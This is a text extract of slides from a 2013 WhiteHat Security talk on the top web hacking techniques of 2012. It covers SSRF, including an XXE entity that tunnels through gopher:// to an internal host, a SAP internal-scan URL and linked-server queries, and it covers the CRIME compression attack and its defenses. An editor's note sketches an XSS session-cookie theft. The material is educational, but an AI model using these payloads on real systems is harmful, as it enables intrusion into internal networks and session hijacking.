  • 60. 2 0 1 2 TO P T EN Pwning via SSRF (memcached, php-fastcgi, etc) ―SSRF, as in Server-Side Request Forgery. A great concept of the attack which was discussed in 2008 with very little information about theory and practical examples. The idea is to find victim server interfaces that will allow sending packets initiated by victim's server to the localhost interface of the victim server or to another server secured by firewall from outside. We have found various SSRF vulnerabilities which allow internal network port scanning, sending any HTTP requests from server, bruteforcing backed and more but the most powerful technique was XXE Tunneling.‖ Alexander Polyakov http://media.blackhat.com/bh-us-12/Briefings/Polyakov/BH_US_12_Polyakov_SSRF_Business_WP.pdf http://erpscan.com/press-center/blog/ssrf-via-ws-adressing/ http://erpscan.com/wp-content/uploads/2012/11/SSRF.2.0.poc_.pdf © 2013 WhiteHat Security, Inc. 60
  • 61. H ISTO RY SSRF (CIRCA 2008) “The first example of SSRF is an SMBRelay attack discussed by Deral Heiland at Shmoocon in 2008 entitled, “Web Portals Gateway To Information Or A Hole In Our Perimeter Defenses.” Some web-interfaces on corporate portals allow loading any external resource like an iframe. The difference was that Web interface allows loading files from other HTTP sources. It was done by portlets that were designed to deliver to the user the requested information that the user cannot access directly. The portlet runs a transaction to a connected system and then runs its response with information to the portal user. These portlets makes portal a single point of access to internal resources. This was a great example of SSRF attack via URL parameter of vulnerable portlet.” … “Later, other examples of SSRF attacks were shown. Same ideas, but attack was executed through XML External Entity vulnerability. “ © 2013 WhiteHat Security, Inc. 61
  • 62. BASIC S Attack Flow • Send Packet A to Service A • Service A initiates Packet B to Service B • Services can be on the same host or on different hosts • We can manipulate some fields of Packet B within Packet A • Various SSRF attacks depend on how many fields we can control in Packet B Exploitation • Vulnerabilities like File Include, SQL Injection, XML External Entity or any other vulnerability that allows executing commands that initiate calls to remote systems. • Through enhanced rights in an application, when you can call HTTP pages or UNC paths or use trusted connections. © 2013 WhiteHat Security, Inc. 62
  • 63. C L ASSIF IC AT ION Many classes of SSRF attacks (complicated) • Trusted SSRF: Send requests (Packet B) to remote services, but only to those which are somehow predefined. • Remote SSRF: Requests (Packet B) to any remote IP and port. This type has 3 subtypes depending on how much data we can control: • Simple Remote SSRF: No control on application level of Packet B • Partial Remote SSRF: Control on some fields of application level of Packet B • Full Remote SSRF: Full control on application level of Packet B © 2013 WhiteHat Security, Inc. 63
  • 64. EXAMPL ES Trusted SSRF attacks MSSQL: Need at least public rights to use MSSQL trusted links. Links can be with predefined passwords. The attacker can use them in Host A to forge requests and obtain responses from Host B. Select * from openquery(HostB,'select * from @@version')] Oracle: Links can be with predefined passwords. The attacker can use them to forge requests and obtain responses from host B. SELECT * FROM myTable@HostB EXECUTE mySchema.myPackage.myProcedure('someParameter')@HostB © 2013 WhiteHat Security, Inc. 64
  • 65. EXAMPL ES Simple Remote SSRF SAP NetWeaver ipcpricing: Scan an internal network from the Internet by sending different HTTP requests to JSP pages. /ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13&port=31337&dispatcher=&targetCli ent= © 2013 WhiteHat Security, Inc. 65
  • 66. XXE T U N N EL IN G Partial Remote SSRF XXE Tunneling (via Gopher): XML External Entity (XXE) is a very popular vulnerability in XML Parser. External entities force the XML parser to access the resource specified by the URI, e.g., a file on the local machine or on a remote systems. • Makes a TCP connection with 172.16.0.1 and port 3300 and then send a packet containing string 23456789 (the first symbol will be cut). <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM ―gopher://172.16.0.1:3300/AAAAAAAAA" >]> <foo>&date;</foo> © 2013 WhiteHat Security, Inc. 66
  • 67. D IAG R AM © 2013 WhiteHat Security, Inc. 67
  • 68. AD VAN C ED XXE Tunneling to Buffer Overflow • A buffer overflow vulnerability found by Virtual Forge in ABAP Kernel (fixed in sapnote 1487330) • Shellcode size is limited to 255 bytes (name parameter) • As we don‘t have direct connection to the Internet from the vulnerable system, we want to use DNS tunneling shellcode to connect back © 2013 WhiteHat Security, Inc. 68
  • 69. PAC KET B © 2013 WhiteHat Security, Inc. 69
  • 70. PAC KET A Insert Packet B into Packet A • We need to insert non-printable symbols. Gopher supports urlencode like HTTP • Also help evade attack against IDS systems © 2013 WhiteHat Security, Inc. 70
  • 71. FULL CONTROL © 2013 WhiteHat Security, Inc. 71
  • 72. C O U N T ER -AT TAC K SSRF back connect attack We send a command from Server A to our Server C using SSRF, and then we generate a response which will trigger a vulnerability in an application from Server A. SMB client • DoS by reading huge files remotely • SMBRelay • RCE Vulnerabilities in SMB client Memory corruption vulnerabilities in FTP client Client path traversal JAR parser mailto: parser HTTP client • DoS by multiple entities with links to big data • DoS by multiple GZIP bomb © 2013 WhiteHat Security, Inc. 72
  • 73. 2 0 1 2 TO P T EN CRIME ―Compression Ratio Info-leak Made Easy (CRIME) is a security exploit against secret web cookies over connections using the HTTPS and SPDY protocols that also use data compression. When used to recover the content of secret authentication cookies, it allows an attacker to perform session hijacking.‖ Juliano Rizzo and Thai Duong http://netifera.com/research/crime/CRIME_ekoparty2012.pdf http://en.wikipedia.org/wiki/CRIME_(security_exploit) http://arstechnica.com/security/2012/09/crime-hijacks-https-sessions/ © 2013 WhiteHat Security, Inc. 73
  • 74. BASIC S CRIME Decrypts HTTPS traffic to steal cookies and hijack sessions. Requirements to become a victim: 1) Attacker can sniff your network traffic. 2) Victim visits evil.com 3) Both the browser and server support any version of TLS compression or SPDY Previously * Vulnerable Never Vulnerable Gmail, Twitter, Dropbox, GitHub, etc. “42% of sites surveyed by his service support TLS compression.” Ivan Ristic https://www.ssllabs.com/index.html © 2013 WhiteHat Security, Inc. 74
  • 75. SID E - C H AN NEL CRIME: Chosen Plaintext Attack • Compression reduces the number of bytes contained in a data stream by removing redundant bits. A side effect of compression is it leaks clues about the encrypted contents, providing a "side channel" to those with the ability to monitor the data. • By modifying the clear-text payload hundreds or thousands of times and watching how each one interacts with the encrypted data, attackers can deduce its contents. • An encrypted message is combined with attacker-controlled JavaScript that, letter by letter, performs a brute-force attack on the secret key. When it guesses the letter X as the first character of the cookie secret, the encrypted message will appear differently than an encrypted message that uses W or Y. • Once the first character is correctly guessed, the attack repeats the process again on the next character in the key until the remainder of the secret is deduced. The use of JavaScript isn't necessary, but does make the brute-force attack faster. http://arstechnica.com/security/2012/09/crime-hijacks-https-sessions/ © 2013 WhiteHat Security, Inc. 75
  • 76. AT TAC K F L O W "Basically, the attacker is running script in Evil.com. He forces the browser to open requests to Bank.com by, for example, adding <img> tags with src pointing to Bank.com," Rizzo said. "Each of those requests contains data from mixed sources.” In these requests, attacker data and data produced by the browser is compressed and mixed together. Those requests can include the path, which the attacker controls, the browser's headers, which are public, and the cookie, which should be secret. "The problem is that compression combines all those sources together," Rizzo added. "The attacker can sniff the packets and get the size of the requests that are sent. By changing the path, he could attempt to minimize the request size, i.e., when the file name matches the cookie." http://threatpost.com/en_us/blogs/crime-attack-uses-compression-ratio-tls-requests-side-channel-hijack-secure-sessions-091312 © 2013 WhiteHat Security, Inc. 76
  • 77. D EMO Video demo shows Github.com, Dropbox.com, and Stripe.com, when visited with a then-patched version of Chrome, succumbing to the CRIME attack. All three of disabled compression and no longer vulnerable. https://www.youtube.com/watch?v=gGPhHYyg9r4 © 2013 WhiteHat Security, Inc. 77
  • 78. D EF EN SE Browser Upgrade browsers to the latest version. Server Disable compression. © 2013 WhiteHat Security, Inc. 78
  • 79. WHAT WE’VE LEARNED © 2013 WhiteHat Security, Inc. 79
  • 80. L ESSO N S • What’s old is new and improved: Many Web attack techniques from previous years, including those not appearing on the Top Ten, are constantly being improved. Researchers leverage new technology functionality and combine previously known techniques and produce combinations. • 3-Peat: Encryption related attack techniques, by Juliano Rizzo and Thai Duong, took the #1 spot 3 years in a row (BEAST in 2011 and Padding Oracle in 2010). Web security community respects deep technical research. • Attack and Researcher Diversity: In 2012 we saw attack techniques focused on encryption, HTML5 / client-side, mobile, infrastructure server-side, intranet, session state, etc. The range of expertise to keep up with all the new cutting-edge research is at the very least, a full-time job. And the researchers themselves are located across the globe. © 2013 WhiteHat Security, Inc. 80
  • 81. Thank you to… • All Web security researchers • Panel of Judges: Ryan Barnett, Robert Auger, Robert Hansen (CEO, Falling Rock Networks) Dinis Cruz, Jeff Williams (CEO, Aspect Security), Peleus Uhley, Romain Gaucher (Lead Researcher, Coverity), Giorgio Maone, Chris Wysopal, Troy Hunt, Ivan Ristic (Director of Engineering, Qualys), and Steve Christey (MITRE) • Everyone in the Web security community who assisted with voting JEREMIAH GROSSMAN MATT JOHANSEN Founder and CTO Head of the Threat Research Center Twitter: @jeremiahg Twitter: @mattjay Email: jeremiah@whitehatsec.com Email: matt@whitehatsec.com

Editor's Notes

  1. According to the provided scenario, the exploit will not work if the victim has already accessed the login.php page. This is not always the case. For example, many web applications have a logout page whose job is to clear session data and to issue either new session cookie or empty session session cookie such as PHPSESSID=deleted. Here, our XSS payload will call this logout page first and then call the login page which issues HttpOnly session cookie.
  2. \\
  3. Yay HTML5!